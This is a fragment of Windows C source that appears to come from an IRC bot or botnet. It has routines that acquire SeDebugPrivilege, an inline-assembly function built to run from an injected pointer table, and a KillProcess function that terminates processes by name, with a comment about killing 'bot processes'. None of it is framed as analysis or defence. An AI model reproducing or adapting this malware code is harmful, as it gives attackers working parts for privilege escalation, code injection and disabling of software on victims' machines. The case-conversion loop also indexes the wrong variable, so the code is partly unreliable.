BOOL AdjustPrivileges(char *pPriv, BOOL add)
{
BOOL bRet = FALSE;
TOKEN_PRIVILEGES tkp;
HANDLE hToken;
if (!fOpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,&hToken))
return bRet;
if (!fLookupPrivilegeValue(NULL, pPriv, &tkp.Privileges[0].Luid)) {
CloseHandle(hToken);
return bRet;
}
tkp.PrivilegeCount = 1;
if (add)
tkp.Privileges[0].Attributes |= SE_PRIVILEGE_ENABLED;
else
tkp.Privileges[0].Attributes ^= (SE_PRIVILEGE_ENABLED &
tkp.Privileges[0].Attributes);
bRet=fAdjustTokenPrivileges(hToken,FALSE,&tkp,0,(PTOKEN_PRIVILEGES) NULL, 0);
CloseHandle(hToken);
return bRet;
}
BOOL GetDebugPrivs(HANDLE &hToken,TOKEN_PRIVILEGES &tPrivOld)
{
TOKEN_PRIVILEGES tPriv;
DWORD cbPriv=sizeof(tPrivOld);
BOOL bRet=FALSE;
if(!fOpenThreadToken(GetCurrentThread(), TOKEN_QUERY|TOKEN_ADJUST_PRIVILEGES, FALSE, &hToken))
if(!fOpenProcessToken(GetCurrentProcess(), TOKEN_QUERY|TOKEN_ADJUST_PRIVILEGES, &hToken))
hToken=NULL;
if(hToken)
{
tPriv.PrivilegeCount=1;
tPriv.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
fLookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tPriv.Privileges[0].Luid);
if(fAdjustTokenPrivileges(hToken, FALSE, &tPriv, sizeof(tPriv), &tPrivOld, &cbPriv))
{
if(GetLastError()==ERROR_NOT_ALL_ASSIGNED)
{
CloseHandle(hToken);
hToken=NULL;
}
else
bRet=TRUE;
}
else
{
CloseHandle(hToken);
hToken=NULL;
}
}
return bRet;
}
// OpenProcessToken
// GetCurrentProcess
// LookupPrivilegeValue
// AdjustTokenPrivileges
// SE_DEBUG_NAME "SeDebugPrivilege"
BOOL WINAPI IC_SetDebugPrivilege(HANDLE *phProcessToken, TOKEN_PRIVILEGES *pOldToken, DWORD *pdwOldCount)
{
TOKEN_PRIVILEGES stNewToken;
char *pSeDebugPrivilege = NULL;
t_fAdjustTokenPrivilegeS fAdjustTokenPrivileges = NULL;
t_fLookUpPrivilegeValue fLookupPrivilegeValue = NULL;
t_fGetCurrentProcess fGetCurrentProcess = NULL;
t_fOpenProcessToken fOpenProcessToken = NULL;
DWORD *pFuncPtr = NULL;
_asm MOV pFuncPtr, EAX
pFuncPtr -= 2;
pSeDebugPrivilege = (char*)*pFuncPtr;
pFuncPtr--;
fAdjustTokenPrivileges = (t_fAdjustTokenPrivilegeS)*pFuncPtr;
pFuncPtr--;
fLookupPrivilegeValue = (t_fLookUpPrivilegeValue)*pFuncPtr;
pFuncPtr--;
fGetCurrentProcess = (t_fGetCurrentProcess)*pFuncPtr;
pFuncPtr--;
fOpenProcessToken = (t_fOpenProcessToken)*pFuncPtr;
if ( !fOpenProcessToken(fGetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, phProcessToken) )
{
return FALSE;
}
if ( !fLookupPrivilegeValue(NULL, pSeDebugPrivilege, &(stNewToken.Privileges[0].Luid)) )
{
return FALSE;
}
stNewToken.PrivilegeCount = 1;
stNewToken.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if ( !fAdjustTokenPrivileges(*phProcessToken, FALSE, &stNewToken, sizeof(TOKEN_PRIVILEGES), pOldToken, pdwOldCount) )
{
return FALSE;
}
return TRUE;
}
bool KillProcess(const char *szProcName, char *procKilled) {
DWORD aProcesses[1024], cbNeeded, cProcesses;
bool bRetVal=false;
unsigned int i;
HMODULE hMod;
// Get SeDebugPrivileges
TOKEN_PRIVILEGES tPriv, tPrivOld;
DWORD cbPriv=sizeof(tPrivOld);
HANDLE hToken;
if(!fOpenThreadToken(GetCurrentThread(), TOKEN_QUERY|TOKEN_ADJUST_PRIVILEGES, FALSE, &hToken))
if(!fOpenProcessToken(GetCurrentProcess(), TOKEN_QUERY|TOKEN_ADJUST_PRIVILEGES, &hToken))
hToken=NULL;
if(hToken) {
tPriv.PrivilegeCount=1; tPriv.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
fLookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tPriv.Privileges[0].Luid);
if(fAdjustTokenPrivileges(hToken, FALSE, &tPriv, sizeof(tPriv), &tPrivOld, &cbPriv)) {
if(GetLastError()==ERROR_NOT_ALL_ASSIGNED) {
CloseHandle(hToken); hToken=NULL;
}
} else {
CloseHandle(hToken);
hToken=NULL;
}
}
// Enumerate processes
if(!fEnumProcesses(aProcesses, sizeof(aProcesses), &cbNeeded))
return false;
cProcesses=cbNeeded/sizeof(DWORD);
unsigned int killed=0;
for(i=0; i<cProcesses; i++) {
char szProcessName[MAX_PATH];
strcpy(szProcessName, "unknown");
HANDLE hProcess=OpenProcess(PROCESS_QUERY_INFORMATION|PROCESS_VM_READ|PROCESS_TERMINATE,FALSE,aProcesses[i]);
if(hProcess) {
if(fEnumProcessModules(hProcess, &hMod, sizeof(hMod), &cbNeeded)) {
fGetModuleBaseName(hProcess, hMod, szProcessName, sizeof(szProcessName));
for(int ipn=0;ipn<strlen(szProcessName);ipn++)
*(szProcessName+i)=toupper(*(szProcessName+i));
if(!szProcName) {
bRetVal=false; // FIX ME: Could Kill all bot processes here
}
else { // Kill the named process
if(!strcmp(szProcessName, szProcName)) {
killed++;
TerminateProcess(hProcess, 0);
bRetVal=true;
}
}
}
CloseHandle(hProcess);
}
}
if (procKilled)
sprintf(procKilled,"%i",killed);
// Drop SeDebugPrivileges
if(hToken) {
fAdjustTokenPrivileges(hToken, FALSE, &tPrivOld, sizeof(tPrivOld), NULL, NULL);
CloseHandle(hToken);
}
return bRetVal;
}